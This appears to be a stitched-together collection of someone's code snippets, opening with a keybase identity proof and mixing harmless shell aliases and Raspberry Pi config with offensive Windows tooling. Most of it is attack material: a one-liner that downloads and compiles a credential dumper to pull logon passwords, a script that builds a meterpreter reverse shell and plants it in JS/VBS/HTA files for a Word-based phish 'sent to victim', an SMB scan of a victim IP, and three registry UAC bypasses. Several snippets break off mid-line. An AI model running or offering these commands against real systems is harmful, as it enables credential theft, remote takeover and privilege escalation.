I hereby claim:
- I am xillwillx on github.
- I am illwill (https://keybase.io/illwill) on keybase.
- I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737
To claim this, I am signing this object:
$admins = Gwmi win32_groupuser -computer 127.0.0.1;$admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}; $admins |% {$_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul;$matches[1].trim('"') + "\" + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}}

iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process

ssh [email protected]
nano /boot/config.txt
ctrl+w to find
Type: i2c_arm and add the uncommented lines underneath
## i2c_arm
## Enable the ARM's i2c interface
##
## Default off.
##

export PATH="$PATH:/usr/bin/"
alias ll='ls -GFHAf -1' # ll: directory listing in 1 column
alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder
alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias wttr='curl wttr.in/06451?0u'
alias myip='curl -s http://whatismyip.akamai.com/' ;echo

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\

# Test victim IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS 192.168.128.19
exploit
#*choose pipe name 'netlogon'
######Exploiting the Victim##########
# Setup Meterpreter Handler

<#
.Synopsis
 ____ _ _ ___ _ _ _
| __(_)__| |_ / __| |_(_)__| |__ ___
| _|| (_-< ' \\__ \ _| / _| / /(_-<
|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1
"Life is like a box of FishSticks, you never know what you're gonna get..."
Benjamin Buford "Bubba" Blue - 1965.

**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f